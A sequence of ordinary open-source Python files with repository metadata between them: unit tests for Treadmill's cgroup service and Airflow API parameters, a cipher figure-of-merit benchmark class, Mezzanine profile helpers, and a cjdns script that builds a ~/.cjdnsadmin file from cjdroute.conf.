# Verify
self.assertEqual(code, exceptions.CODE_PERMISSIONS_EXCEPTION)
self.assertEqual(self.handler._handle_permission_error.call_count, 1)
def test_handle_code_invalid_ssl_cert(self):
# Setup
response_doc = auth_utils.generate_failure_response(auth_utils.CODE_INVALID_SSL_CERT)
e = bindings_exceptions.PermissionsException(response_doc)
# Test
code = self.handler.handle_permission(e)
# Verify
self.assertEqual(code, exceptions.CODE_PERMISSIONS_EXCEPTION)
self.assertEqual(self.handler._handle_authentication_failed.call_count, 1)
def test_handle_code_username(self):
# Setup
response_doc = auth_utils.generate_failure_response(auth_utils.CODE_USER_PASS)
e = bindings_exceptions.PermissionsException(response_doc)
# Test
code = self.handler.handle_permission(e)
# Verify
self.assertEqual(code, exceptions.CODE_PERMISSIONS_EXCEPTION)
self.assertEqual(self.handler._handle_invalid_username.call_count, 1)
def test_handle_code_unknown(self):
# Setup
response_doc = auth_utils.generate_failure_response('foo')
e = bindings_exceptions.PermissionsException(response_doc)
# Test
code = self.handler.handle_permission(e)
# Verify
self.assertEqual(code, exceptions.CODE_PERMISSIONS_EXCEPTION)
self.assertEqual(self.handler._handle_unknown.call_count, 1)
| gpl-2.0 | -7,532,193,940,021,664,000 | 37.601449 | 95 | 0.689131 | false |
bretttegart/treadmill | tests/services/cgroup_service_test.py | 1 | 6817 | """Unit test for cgroup_service - Treadmill cgroup service.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import os
import tempfile
import unittest
import select
import shutil
# Disable W0611: Unused import
import tests.treadmill_test_skip_windows # pylint: disable=W0611
import mock
import treadmill
from treadmill import services
from treadmill.services import cgroup_service
class CGroupServiceTest(unittest.TestCase):
"""Unit tests for the cgroup service implementation.
"""
def setUp(self):
self.root = tempfile.mkdtemp()
self.cgroup_svc = os.path.join(self.root, 'cgroup_svc')
self.running = os.path.join(self.root, 'running')
def tearDown(self):
if self.root and os.path.isdir(self.root):
shutil.rmtree(self.root)
def test_initialize(self):
"""Test service initialization.
"""
svc = cgroup_service.CgroupResourceService(self.running)
svc.initialize(self.cgroup_svc)
def test_report_status(self):
"""Test processing of status request.
"""
svc = cgroup_service.CgroupResourceService(self.running)
status = svc.report_status()
self.assertEqual(
status,
{'ready': True}
)
def test_event_handlers(self):
"""Test event_handlers request.
"""
svc = cgroup_service.CgroupResourceService(self.running)
handlers = svc.event_handlers()
self.assertEqual(
handlers,
[]
)
@mock.patch('treadmill.cgroups.create', mock.Mock())
@mock.patch('treadmill.cgroups.get_value', mock.Mock(return_value=10000))
@mock.patch('treadmill.cgroups.inherit_value', mock.Mock())
@mock.patch('treadmill.cgroups.join', mock.Mock())
@mock.patch('treadmill.cgroups.set_value', mock.Mock())
@mock.patch('treadmill.services.cgroup_service.CgroupResourceService.'
'_register_oom_handler', mock.Mock())
def test_on_create_request(self):
"""Test processing of a cgroups create request.
"""
# Access to a protected member _register_oom_handler of a client class
# pylint: disable=W0212
svc = cgroup_service.CgroupResourceService(self.running)
request = {
'memory': '100M',
'cpu': '100%',
}
request_id = 'myproid.test-0-ID1234'
svc.on_create_request(request_id, request)
cgrp = os.path.join('treadmill/apps', request_id)
svc._register_oom_handler.assert_called_with(cgrp, request_id)
treadmill.cgroups.create.assert_has_calls(
[
mock.call(ss, cgrp)
for ss in ['cpu', 'cpuacct', 'cpuset', 'memory', 'blkio']
]
)
        # CPU share calculation:
        #
        # (demand * virtual cpu bmips / total bmips) * treadmill.cpu.shares
        # (100% * 5000 / (24000 * 0.9)) * 10000 = 2314
treadmill.cgroups.set_value.assert_has_calls([
mock.call('blkio', cgrp, 'blkio.weight', 100),
mock.call('memory', cgrp, 'memory.soft_limit_in_bytes', '100M'),
mock.call('memory', cgrp, 'memory.limit_in_bytes', '100M'),
mock.call('memory', cgrp, 'memory.memsw.limit_in_bytes', '100M'),
mock.call('cpu', cgrp, 'cpu.shares',
treadmill.sysinfo.BMIPS_PER_CPU)
])
treadmill.cgroups.inherit_value.assert_has_calls([
mock.call('cpuset', cgrp, 'cpuset.cpus'),
mock.call('cpuset', cgrp, 'cpuset.mems')
])
@mock.patch('treadmill.cgutils.delete', mock.Mock())
@mock.patch('treadmill.services.cgroup_service.CgroupResourceService.'
'_unregister_oom_handler', mock.Mock())
def test_on_delete_request(self):
"""Test processing of a cgroups delete request.
"""
# Access to a protected member _unregister_oom_handler of a client
# class
# pylint: disable=W0212
svc = cgroup_service.CgroupResourceService(self.running)
request_id = 'myproid.test-0-ID1234'
svc.on_delete_request(request_id)
cgrp = os.path.join('treadmill/apps', request_id)
treadmill.cgutils.delete.assert_has_calls(
[
mock.call(ss, cgrp)
for ss in ['cpu', 'cpuacct', 'cpuset', 'memory', 'blkio']
]
)
svc._unregister_oom_handler.assert_called_with(cgrp)
@mock.patch('treadmill.cgutils.get_memory_oom_eventfd',
mock.Mock(return_value='fake_efd'))
def test__register_oom_handler(self):
"""Test registration of OOM handler.
"""
# Access to a protected member _register_oom_handler of a client class
# pylint: disable=W0212
svc = cgroup_service.CgroupResourceService(self.running)
registered_handlers = svc.event_handlers()
self.assertNotIn(
('fake_efd', select.POLLIN, mock.ANY),
registered_handlers
)
cgrp = 'treadmill/apps/myproid.test-42-ID1234'
svc._register_oom_handler(cgrp, 'myproid.test-42-ID1234')
treadmill.cgutils.get_memory_oom_eventfd.assert_called_with(cgrp)
registered_handlers = svc.event_handlers()
self.assertIn(
('fake_efd', select.POLLIN, mock.ANY),
registered_handlers
)
@mock.patch('os.close', mock.Mock())
@mock.patch('treadmill.cgutils.get_memory_oom_eventfd',
mock.Mock(return_value='fake_efd'))
def test__unregister_oom_handler(self):
"""Test unregistration of OOM handler.
"""
# Access to a protected member _unregister_oom_handler of a client
# class
# pylint: disable=W0212
svc = cgroup_service.CgroupResourceService(self.running)
cgrp = 'treadmill/apps/myproid.test-42-ID1234'
svc._register_oom_handler(cgrp, 'myproid.test-42-ID1234')
registered_handlers = svc.event_handlers()
self.assertIn(
('fake_efd', select.POLLIN, mock.ANY),
registered_handlers
)
svc._unregister_oom_handler(cgrp)
registered_handlers = svc.event_handlers()
self.assertNotIn(
('fake_efd', select.POLLIN, mock.ANY),
registered_handlers
)
os.close.assert_called_with('fake_efd')
def test_load(self):
"""Test loading service using alias."""
# pylint: disable=W0212
self.assertEqual(
cgroup_service.CgroupResourceService,
services.ResourceService(self.root, 'cgroup')._load_impl()
)
if __name__ == '__main__':
unittest.main()
| apache-2.0 | 7,435,463,282,362,125,000 | 33.256281 | 78 | 0.603638 | false |
GaloisInc/hacrypto | src/Tools/FigureOfMerit/FigureOfMerit/BlockCiphers/Scenario2/SelectedCipher.py | 1 | 18374 | #
# University of Luxembourg
# Laboratory of Algorithmics, Cryptology and Security (LACS)
#
# FigureOfMerit (FOM)
#
# Copyright (C) 2015 University of Luxembourg
#
# Written in 2015 by Daniel Dinu <[email protected]>
#
# This file is part of FigureOfMerit.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
from Scenario2 import Constants
__author__ = 'daniel.dinu'
class SelectedCipher:
def __init__(self, name, block_size, key_size, link, security_level):
"""
Initialize selected cipher
:param name: Selected cipher name
:param block_size: Selected cipher block size
:param key_size: Selected cipher key size
:param link: Selected cipher link
:param security_level: Selected cipher security level
"""
self.name = name
self.block_size = block_size
self.key_size = key_size
self.link = link
self.security_level = security_level
self.name_link = Constants.MEDIAWIKI_CIPHER_NAME_FORMAT.format(self.link, self.name)
self.avr_metrics1 = ''
self.avr_metrics2 = ''
self.avr_metrics3 = ''
self.msp_metrics1 = ''
self.msp_metrics2 = ''
self.msp_metrics3 = ''
self.arm_metrics1 = ''
self.arm_metrics2 = ''
self.arm_metrics3 = ''
self.avr_version1 = 0
self.avr_version2 = 0
self.avr_version3 = 0
self.msp_version1 = 0
self.msp_version2 = 0
self.msp_version3 = 0
self.arm_version1 = 0
self.arm_version2 = 0
self.arm_version3 = 0
self.avr_compiler_options1 = ''
self.avr_compiler_options2 = ''
self.avr_compiler_options3 = ''
self.msp_compiler_options1 = ''
self.msp_compiler_options2 = ''
self.msp_compiler_options3 = ''
self.arm_compiler_options1 = ''
self.arm_compiler_options2 = ''
self.arm_compiler_options3 = ''
self.fom1_avr = 0
self.fom2_avr = 0
self.fom3_avr = 0
self.fom1_msp = 0
self.fom2_msp = 0
self.fom3_msp = 0
self.fom1_arm = 0
self.fom2_arm = 0
self.fom3_arm = 0
self.fom1 = 0
self.fom2 = 0
self.fom3 = 0
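    # Illustrative instantiation (added comment; the cipher name, link and
    # sizes below are hypothetical placeholders, not project data):
    #
    #   cipher = SelectedCipher('ExampleCipher', 64, 128,
    #                           'https://example.org/cipher', 96)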
def compute_fom1(self,
avr_min_code_size,
msp_min_code_size,
arm_min_code_size,
                     avr_min_ram,
                     msp_min_ram,
arm_min_ram,
avr_min_execution_time,
msp_min_execution_time,
arm_min_execution_time,
avr_max_code_size,
msp_max_code_size,
arm_max_code_size,
avr_max_ram,
msp_max_ram,
arm_max_ram,
avr_max_execution_time,
msp_max_execution_time,
arm_max_execution_time):
"""
Compute cipher implementation FOM 1
:param avr_min_code_size: AVR min code size
:param msp_min_code_size: MSP min code size
:param arm_min_code_size: ARM min code size
:param avr_min_ram: AVR min RAM
:param msp_min_ram: MSP min RAM
:param arm_min_ram: ARM min RAM
:param avr_min_execution_time: AVR min execution time
:param msp_min_execution_time: MSP min execution time
:param arm_min_execution_time: ARM min execution time
:param avr_max_code_size: AVR max code size
:param msp_max_code_size: MSP max code size
:param arm_max_code_size: ARM max code size
:param avr_max_ram: AVR max RAM
:param msp_max_ram: MSP max RAM
:param arm_max_ram: ARM max RAM
:param avr_max_execution_time: AVR max execution time
:param msp_max_execution_time: MSP max execution time
:param arm_max_execution_time: ARM max execution time
"""
# AVR
avr_code_size = self.avr_metrics1.code_size_e
avr_ram = self.avr_metrics1.ram_data + self.avr_metrics1.ram_stack_e
avr_execution_time = self.avr_metrics1.execution_time_e
# MSP
msp_code_size = self.msp_metrics1.code_size_e
msp_ram = self.msp_metrics1.ram_data + self.msp_metrics1.ram_stack_e
msp_execution_time = self.msp_metrics1.execution_time_e
# ARM
arm_code_size = self.arm_metrics1.code_size_e
arm_ram = self.arm_metrics1.ram_data + self.arm_metrics1.ram_stack_e
arm_execution_time = self.arm_metrics1.execution_time_e
# AVR weights
avr_code_size_weight = Constants.FOM1_AVR_CODE_SIZE_WEIGHT
avr_ram_weight = Constants.FOM1_AVR_RAM_WEIGHT
avr_execution_time_weight = Constants.FOM1_AVR_EXECUTION_TIME_WEIGHT
# MSP weights
msp_code_size_weight = Constants.FOM1_MSP_CODE_SIZE_WEIGHT
msp_ram_weight = Constants.FOM1_MSP_RAM_WEIGHT
msp_execution_time_weight = Constants.FOM1_MSP_EXECUTION_TIME_WEIGHT
# ARM weights
arm_code_size_weight = Constants.FOM1_ARM_CODE_SIZE_WEIGHT
arm_ram_weight = Constants.FOM1_ARM_RAM_WEIGHT
arm_execution_time_weight = Constants.FOM1_ARM_EXECUTION_TIME_WEIGHT
# AVR
avr_fom_code_size = avr_code_size_weight * (avr_code_size / avr_min_code_size)
avr_fom_ram = avr_ram_weight * (avr_ram / avr_min_ram)
avr_fom_execution_time = avr_execution_time_weight * (avr_execution_time / avr_min_execution_time)
avr_fom = avr_fom_code_size + avr_fom_ram + avr_fom_execution_time
# MSP
msp_fom_code_size = msp_code_size_weight * (msp_code_size / msp_min_code_size)
msp_fom_ram = msp_ram_weight * (msp_ram / msp_min_ram)
msp_fom_execution_time = msp_execution_time_weight * (msp_execution_time / msp_min_execution_time)
msp_fom = msp_fom_code_size + msp_fom_ram + msp_fom_execution_time
# ARM
arm_fom_code_size = arm_code_size_weight * (arm_code_size / arm_min_code_size)
arm_fom_ram = arm_ram_weight * (arm_ram / arm_min_ram)
arm_fom_execution_time = arm_execution_time_weight * (arm_execution_time / arm_min_execution_time)
arm_fom = arm_fom_code_size + arm_fom_ram + arm_fom_execution_time
if Constants.DEBUG_ON == Constants.DEBUG:
print(Constants.CIPHER_IMPLEMENTATION_FOM1_DETAILS.format(avr_fom_code_size,
avr_fom_ram,
avr_fom_execution_time,
avr_fom,
msp_fom_code_size,
msp_fom_ram,
msp_fom_execution_time,
msp_fom,
arm_fom_code_size,
arm_fom_ram,
arm_fom_execution_time,
arm_fom))
# FOM 1
self.fom1_avr = avr_fom
self.fom1_msp = msp_fom
self.fom1_arm = arm_fom
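    # Summary of the FOM 1 formula implemented above (added comment). For each
    # device the weighted ratios against the per-device minima are summed:
    #
    #   fom1_dev = w_cs * (cs / cs_min) + w_ram * (ram / ram_min) + w_t * (t / t_min)
    #
    # so a cipher that matches every minimum on a device scores exactly
    # w_cs + w_ram + w_t (i.e. 1.0 when the three weights sum to one).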
def compute_fom2(self,
avr_min_code_size,
msp_min_code_size,
arm_min_code_size,
avr_min_ram,
msp_min_ram,
arm_min_ram,
avr_min_execution_time,
msp_min_execution_time,
arm_min_execution_time,
avr_max_code_size,
msp_max_code_size,
arm_max_code_size,
avr_max_ram,
msp_max_ram,
arm_max_ram,
avr_max_execution_time,
msp_max_execution_time,
arm_max_execution_time):
"""
Compute cipher implementation FOM 2
:param avr_min_code_size: AVR min code size
:param msp_min_code_size: MSP min code size
:param arm_min_code_size: ARM min code size
:param avr_min_ram: AVR min RAM
:param msp_min_ram: MSP min RAM
:param arm_min_ram: ARM min RAM
:param avr_min_execution_time: AVR min execution time
:param msp_min_execution_time: MSP min execution time
:param arm_min_execution_time: ARM min execution time
:param avr_max_code_size: AVR max code size
:param msp_max_code_size: MSP max code size
:param arm_max_code_size: ARM max code size
:param avr_max_ram: AVR max RAM
:param msp_max_ram: MSP max RAM
:param arm_max_ram: ARM max RAM
:param avr_max_execution_time: AVR max execution time
:param msp_max_execution_time: MSP max execution time
:param arm_max_execution_time: ARM max execution time
"""
# AVR
avr_code_size = self.avr_metrics2.code_size_e
avr_ram = self.avr_metrics2.ram_data + self.avr_metrics2.ram_stack_e
avr_execution_time = self.avr_metrics2.execution_time_e
# MSP
msp_code_size = self.msp_metrics2.code_size_e
msp_ram = self.msp_metrics2.ram_data + self.msp_metrics2.ram_stack_e
msp_execution_time = self.msp_metrics2.execution_time_e
# ARM
arm_code_size = self.arm_metrics2.code_size_e
arm_ram = self.arm_metrics2.ram_data + self.arm_metrics2.ram_stack_e
arm_execution_time = self.arm_metrics2.execution_time_e
# AVR weights
avr_code_size_weight = Constants.FOM2_AVR_CODE_SIZE_WEIGHT
avr_ram_weight = Constants.FOM2_AVR_RAM_WEIGHT
avr_execution_time_weight = Constants.FOM2_AVR_EXECUTION_TIME_WEIGHT
# MSP weights
msp_code_size_weight = Constants.FOM2_MSP_CODE_SIZE_WEIGHT
msp_ram_weight = Constants.FOM2_MSP_RAM_WEIGHT
msp_execution_time_weight = Constants.FOM2_MSP_EXECUTION_TIME_WEIGHT
# ARM weights
arm_code_size_weight = Constants.FOM2_ARM_CODE_SIZE_WEIGHT
arm_ram_weight = Constants.FOM2_ARM_RAM_WEIGHT
arm_execution_time_weight = Constants.FOM2_ARM_EXECUTION_TIME_WEIGHT
# AVR
avr_fom_code_size = avr_code_size_weight * (avr_code_size / Constants.AVR_MAX_ROM)
avr_fom_ram = avr_ram_weight * (avr_ram / Constants.AVR_MAX_RAM)
avr_fom_execution_time = avr_execution_time_weight
avr_fom = avr_fom_code_size + avr_fom_ram + avr_fom_execution_time
# MSP
msp_fom_code_size = msp_code_size_weight * (msp_code_size / Constants.MSP_MAX_ROM)
msp_fom_ram = msp_ram_weight * (msp_ram / Constants.MSP_MAX_RAM)
msp_fom_execution_time = msp_execution_time_weight
msp_fom = msp_fom_code_size + msp_fom_ram + msp_fom_execution_time
# ARM
arm_fom_code_size = arm_code_size_weight * (arm_code_size / Constants.ARM_MAX_ROM)
arm_fom_ram = arm_ram_weight * (arm_ram / Constants.ARM_MAX_RAM)
arm_fom_execution_time = arm_execution_time_weight
arm_fom = arm_fom_code_size + arm_fom_ram + arm_fom_execution_time
if Constants.DEBUG_ON == Constants.DEBUG:
print(Constants.CIPHER_IMPLEMENTATION_FOM2_DETAILS.format(avr_fom_code_size,
avr_fom_ram,
avr_fom_execution_time,
avr_fom,
msp_fom_code_size,
msp_fom_ram,
msp_fom_execution_time,
msp_fom,
arm_fom_code_size,
arm_fom_ram,
arm_fom_execution_time,
arm_fom))
# FOM 2
self.fom2_avr = avr_fom
self.fom2_msp = msp_fom
self.fom2_arm = arm_fom
def compute_fom3(self,
avr_min_code_size,
msp_min_code_size,
arm_min_code_size,
avr_min_ram,
msp_min_ram,
arm_min_ram,
avr_min_execution_time,
msp_min_execution_time,
arm_min_execution_time,
avr_max_code_size,
msp_max_code_size,
arm_max_code_size,
avr_max_ram,
msp_max_ram,
arm_max_ram,
avr_max_execution_time,
msp_max_execution_time,
arm_max_execution_time):
"""
Compute cipher implementation FOM 3
:param avr_min_code_size: AVR min code size
:param msp_min_code_size: MSP min code size
:param arm_min_code_size: ARM min code size
:param avr_min_ram: AVR min RAM
:param msp_min_ram: MSP min RAM
:param arm_min_ram: ARM min RAM
:param avr_min_execution_time: AVR min execution time
:param msp_min_execution_time: MSP min execution time
:param arm_min_execution_time: ARM min execution time
:param avr_max_code_size: AVR max code size
:param msp_max_code_size: MSP max code size
:param arm_max_code_size: ARM max code size
:param avr_max_ram: AVR max RAM
:param msp_max_ram: MSP max RAM
:param arm_max_ram: ARM max RAM
:param avr_max_execution_time: AVR max execution time
:param msp_max_execution_time: MSP max execution time
:param arm_max_execution_time: ARM max execution time
"""
# AVR
avr_code_size = self.avr_metrics3.code_size_e
avr_ram = self.avr_metrics3.ram_data + self.avr_metrics3.ram_stack_e
avr_execution_time = self.avr_metrics3.execution_time_e
# MSP
msp_code_size = self.msp_metrics3.code_size_e
msp_ram = self.msp_metrics3.ram_data + self.msp_metrics3.ram_stack_e
msp_execution_time = self.msp_metrics3.execution_time_e
# ARM
arm_code_size = self.arm_metrics3.code_size_e
arm_ram = self.arm_metrics3.ram_data + self.arm_metrics3.ram_stack_e
arm_execution_time = self.arm_metrics3.execution_time_e
# AVR weights
avr_code_size_weight = Constants.FOM3_AVR_CODE_SIZE_WEIGHT
avr_ram_weight = Constants.FOM3_AVR_RAM_WEIGHT
avr_execution_time_weight = Constants.FOM3_AVR_EXECUTION_TIME_WEIGHT
# MSP weights
msp_code_size_weight = Constants.FOM3_MSP_CODE_SIZE_WEIGHT
msp_ram_weight = Constants.FOM3_MSP_RAM_WEIGHT
msp_execution_time_weight = Constants.FOM3_MSP_EXECUTION_TIME_WEIGHT
# ARM weights
arm_code_size_weight = Constants.FOM3_ARM_CODE_SIZE_WEIGHT
arm_ram_weight = Constants.FOM3_ARM_RAM_WEIGHT
arm_execution_time_weight = Constants.FOM3_ARM_EXECUTION_TIME_WEIGHT
# AVR
avr_fom_code_size = avr_code_size_weight
avr_fom_ram = avr_ram_weight
avr_fom_execution_time = avr_execution_time_weight * (avr_execution_time / avr_min_execution_time)
avr_fom = avr_fom_code_size + avr_fom_ram + avr_fom_execution_time
# MSP
msp_fom_code_size = msp_code_size_weight
msp_fom_ram = msp_ram_weight
msp_fom_execution_time = msp_execution_time_weight * (msp_execution_time / msp_min_execution_time)
msp_fom = msp_fom_code_size + msp_fom_ram + msp_fom_execution_time
# ARM
arm_fom_code_size = arm_code_size_weight
arm_fom_ram = arm_ram_weight
arm_fom_execution_time = arm_execution_time_weight * (arm_execution_time / arm_min_execution_time)
arm_fom = arm_fom_code_size + arm_fom_ram + arm_fom_execution_time
if Constants.DEBUG_ON == Constants.DEBUG:
print(Constants.CIPHER_IMPLEMENTATION_FOM3_DETAILS.format(avr_fom_code_size,
avr_fom_ram,
avr_fom_execution_time,
avr_fom,
msp_fom_code_size,
msp_fom_ram,
msp_fom_execution_time,
msp_fom,
arm_fom_code_size,
arm_fom_ram,
arm_fom_execution_time,
arm_fom))
# FOM 3
self.fom3_avr = avr_fom
self.fom3_msp = msp_fom
self.fom3_arm = arm_fom
| bsd-3-clause | -5,239,676,012,041,426,000 | 40.664399 | 106 | 0.525852 | false |
douglaskastle/mezzanine | mezzanine/accounts/__init__.py | 34 | 3211 | """
Provides features for non-staff user accounts, such as login, signup
with optional email verification, password reset, and integration
with user profiles models defined by the ``AUTH_PROFILE_MODULE``
setting. Some utility functions for probing the profile model are
included below.
"""
from __future__ import unicode_literals
from django.apps import apps
from django.conf import settings
from django.contrib.auth import get_user_model
from django.core.exceptions import ImproperlyConfigured
from mezzanine.utils.importing import import_dotted_path
class ProfileNotConfigured(Exception):
pass
def get_profile_model():
"""
    Returns the Mezzanine profile model, defined in
    ``settings.AUTH_PROFILE_MODULE``, raising ``ProfileNotConfigured``
    if no profile model is configured.
"""
if not getattr(settings, "AUTH_PROFILE_MODULE", None):
raise ProfileNotConfigured
try:
return apps.get_model(settings.AUTH_PROFILE_MODULE)
except ValueError:
raise ImproperlyConfigured("AUTH_PROFILE_MODULE must be of "
"the form 'app_label.model_name'")
except LookupError:
raise ImproperlyConfigured("AUTH_PROFILE_MODULE refers to "
"model '%s' that has not been installed"
% settings.AUTH_PROFILE_MODULE)
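# Example setting consumed by get_profile_model (added comment; the app and
# model names are placeholders), using the usual "app_label.model_name" form:
#
#   AUTH_PROFILE_MODULE = "myapp.UserProfile"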
def get_profile_for_user(user):
"""
Returns site-specific profile for this user. Raises
``ProfileNotConfigured`` if ``settings.AUTH_PROFILE_MODULE`` is not
set, and ``ImproperlyConfigured`` if the corresponding model can't
be found.
"""
if not hasattr(user, '_mezzanine_profile'):
# Raises ProfileNotConfigured if not bool(AUTH_PROFILE_MODULE)
profile_model = get_profile_model()
profile_manager = profile_model._default_manager.using(user._state.db)
user_field = get_profile_user_fieldname(profile_model, user.__class__)
profile, created = profile_manager.get_or_create(**{user_field: user})
profile.user = user
user._mezzanine_profile = profile
return user._mezzanine_profile
def get_profile_form():
"""
Returns the profile form defined by
``settings.ACCOUNTS_PROFILE_FORM_CLASS``.
"""
from mezzanine.conf import settings
try:
return import_dotted_path(settings.ACCOUNTS_PROFILE_FORM_CLASS)
except ImportError:
raise ImproperlyConfigured("Value for ACCOUNTS_PROFILE_FORM_CLASS "
"could not be imported: %s" %
settings.ACCOUNTS_PROFILE_FORM_CLASS)
def get_profile_user_fieldname(profile_model=None, user_model=None):
"""
Returns the name of the first field on the profile model that
points to the ``auth.User`` model.
"""
Profile = profile_model or get_profile_model()
User = user_model or get_user_model()
for field in Profile._meta.fields:
if field.rel and field.rel.to == User:
return field.name
raise ImproperlyConfigured("Value for AUTH_PROFILE_MODULE does not "
"contain a ForeignKey field for auth.User: %s"
% Profile.__name__)
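# For a typical profile model the field found above is simply named "user";
# a hypothetical model added for illustration only:
#
#   class UserProfile(models.Model):
#       user = models.OneToOneField("auth.User")
#       bio = models.TextField(blank=True)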
| bsd-2-clause | 2,782,236,874,298,456,000 | 34.677778 | 78 | 0.655559 | false |
DinoCow/airflow | tests/api_connexion/test_parameters.py | 7 | 4550 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import unittest
from unittest import mock
from pendulum import DateTime
from pendulum.tz.timezone import Timezone
from airflow.api_connexion.exceptions import BadRequest
from airflow.api_connexion.parameters import (
check_limit,
format_datetime,
format_parameters,
validate_istimezone,
)
from airflow.utils import timezone
from tests.test_utils.config import conf_vars
class TestValidateIsTimezone(unittest.TestCase):
def setUp(self) -> None:
from datetime import datetime
self.naive = datetime.now()
self.timezoned = datetime.now(tz=timezone.utc)
def test_gives_400_for_naive(self):
with self.assertRaises(BadRequest):
validate_istimezone(self.naive)
def test_timezone_passes(self):
assert validate_istimezone(self.timezoned) is None
class TestDateTimeParser(unittest.TestCase):
def setUp(self) -> None:
self.default_time = '2020-06-13T22:44:00+00:00'
self.default_time_2 = '2020-06-13T22:44:00Z'
def test_works_with_datestring_ending_00_00(self):
datetime = format_datetime(self.default_time)
datetime2 = timezone.parse(self.default_time)
assert datetime == datetime2
assert datetime.isoformat() == self.default_time
def test_works_with_datestring_ending_with_zed(self):
datetime = format_datetime(self.default_time_2)
datetime2 = timezone.parse(self.default_time_2)
assert datetime == datetime2
assert datetime.isoformat() == self.default_time # python uses +00:00 instead of Z
def test_raises_400_for_invalid_arg(self):
invalid_datetime = '2020-06-13T22:44:00P'
with self.assertRaises(BadRequest):
format_datetime(invalid_datetime)
class TestMaximumPagelimit(unittest.TestCase):
@conf_vars({("api", "maximum_page_limit"): "320"})
def test_maximum_limit_return_val(self):
limit = check_limit(300)
self.assertEqual(limit, 300)
@conf_vars({("api", "maximum_page_limit"): "320"})
def test_maximum_limit_returns_configured_if_limit_above_conf(self):
limit = check_limit(350)
self.assertEqual(limit, 320)
@conf_vars({("api", "maximum_page_limit"): "1000"})
def test_limit_returns_set_max_if_give_limit_is_exceeded(self):
limit = check_limit(1500)
self.assertEqual(limit, 1000)
@conf_vars({("api", "fallback_page_limit"): "100"})
def test_limit_of_zero_returns_default(self):
limit = check_limit(0)
self.assertEqual(limit, 100)
@conf_vars({("api", "maximum_page_limit"): "1500"})
def test_negative_limit_raises(self):
with self.assertRaises(BadRequest):
check_limit(-1)
class TestFormatParameters(unittest.TestCase):
def test_should_works_with_datetime_formatter(self):
decorator = format_parameters({"param_a": format_datetime})
endpoint = mock.MagicMock()
decorated_endpoint = decorator(endpoint)
decorated_endpoint(param_a='2020-01-01T0:0:00+00:00')
endpoint.assert_called_once_with(param_a=DateTime(2020, 1, 1, 0, tzinfo=Timezone('UTC')))
def test_should_propagate_exceptions(self):
decorator = format_parameters({"param_a": format_datetime})
endpoint = mock.MagicMock()
decorated_endpoint = decorator(endpoint)
with self.assertRaises(BadRequest):
decorated_endpoint(param_a='XXXXX')
@conf_vars({("api", "maximum_page_limit"): "100"})
def test_should_work_with_limit(self):
decorator = format_parameters({"limit": check_limit})
endpoint = mock.MagicMock()
decorated_endpoint = decorator(endpoint)
decorated_endpoint(limit=89)
endpoint.assert_called_once_with(limit=89)
| apache-2.0 | 8,364,605,682,604,583,000 | 35.99187 | 97 | 0.689451 | false |
eXcomm/cjdns | contrib/python/cjdnsadminmaker.py | 6 | 3533 | #!/usr/bin/env python
import json
import os
import sys
import subprocess
# possibly search for running cjdroute processes and check the same folder as they're in
# and/or running find on the home folder
## Wanted: everyone's favorite place to store their cjdroute.conf.
conflocations = ["/etc/cjdroute.conf",
os.getenv("HOME") + "/cjdroute.conf",
os.getenv("HOME") + "/cjdns/cjdroute.conf",
"/usr/local/opt/cjdns/cjdroute.conf"]
cjdnslocations = ["/opt/cjdns",
os.getenv("HOME") + "/cjdns",
os.getenv("HOME") + "/cjdns-git",
"/usr/local/opt/cjdns"]
cjdnsadmin = {}
if os.path.isfile(os.getenv("HOME") + "/.cjdnsadmin"):
validjson = False
try:
cjdnsadmin = json.load(open(os.getenv("HOME") + "/.cjdnsadmin"))
validjson = True
except ValueError:
pass
if validjson:
while True:
r = raw_input(os.getenv("HOME") + "/.cjdnsadmin appears to be a valid JSON file. Update? [Y/n] ")
if r.lower() == "n":
sys.exit()
elif r.lower() == "y" or r == "":
break
else:
print "Invalid response, please enter either y or n"
else:
while True:
r = raw_input(os.getenv("HOME") + "/.cjdnsadmin appears to be a file. Overwrite? [y/N] ")
if r.lower() == "n" or r == "":
sys.exit()
elif r.lower() == "y":
break
else:
print "Invalid response, please enter either y or n"
else:
print "This script will attempt to create " + os.getenv("HOME") + "/.cjdnsadmin"
def validjson(conf):
print "Making valid JSON out of " + conf
print "First, we need to find the cleanconfig program"
cleanconfig = ""
i = 0
while not os.path.isfile(cleanconfig):
if i < len(cjdnslocations):
cleanconfig = cjdnslocations[i] + "/cleanconfig"
i += 1
else:
print "Failed to find cleanconfig"
print "Please tell me where it is"
cleanconfig = raw_input("HINT: <cjdns git>/cleanconfig: ")
print "Using " + cleanconfig
process = subprocess.Popen([cleanconfig], stdin=open(conf), stdout=subprocess.PIPE)
cleanconf = process.stdout.read()
try:
return json.loads(cleanconf)
except ValueError:
open("debug.log", "w+").write(cleanconf)
print "Failed to parse! Check debug.log"
sys.exit(1)
done = False
i = 0
while not done:
    if i < len(conflocations):
        conf = conflocations[i]
        i += 1
    else:
        conf = raw_input("Can't find cjdroute.conf, please give the path to it here: ")
        if conf == "":
            sys.exit(1)
if os.path.isfile(conf):
print "Loading " + conf
try:
cjdrouteconf = json.load(open(conf))
except ValueError:
cjdrouteconf = validjson(conf)
except IOError:
print "Error opening " + conf + ". Do we have permission to access it?"
print "Hint: Try running this as root"
sys.exit(1)
addr, port = cjdrouteconf['admin']['bind'].split(":")
cjdnsadmin["addr"] = addr
cjdnsadmin["port"] = int(port)
cjdnsadmin["password"] = cjdrouteconf['admin']['password']
cjdnsadmin["config"] = conf
adminfile = open(os.getenv("HOME") + "/.cjdnsadmin", "w+")
adminfile.write(json.dumps(cjdnsadmin, indent=4))
adminfile.close()
print "Done! Give it a shot, why dont ya"
done = True
